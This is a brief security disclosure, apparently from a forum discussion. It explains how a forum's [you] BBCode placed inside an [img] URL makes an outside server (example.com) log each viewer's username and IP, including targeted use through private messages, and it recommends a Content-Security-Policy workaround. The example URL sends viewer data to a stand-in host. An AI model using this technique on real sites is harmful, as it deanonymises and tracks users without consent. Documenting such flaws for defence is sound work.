“One of the BBCodes this site uses is [you]. If you place this in a forum or a private message it will insert the user’s logon name, that is viewing the page. If my username was ‘Randomusername’, and someone sent me a private message saying ‘Hello [you]!’, when I opened it, the BBcode would translate to ‘Hello Randomusername!'”
“When you add [you] on the end of an image, you get something like this http://example.com/photo.php?u=[USERNAME_OF_PERSON_VIEWING].jpg.”
TL;DR Use of [img] and [you] bbcode, the latter which gets converted into the person who is viewing it’s username.
example.com then logs the username and IP.
One can use private messages to target specific people with this attack even if the [you] bbcode does not work.
Workaround: Use Content-Security-Policy to restrict
img-src to approved image hosts or proxy images over your own servers.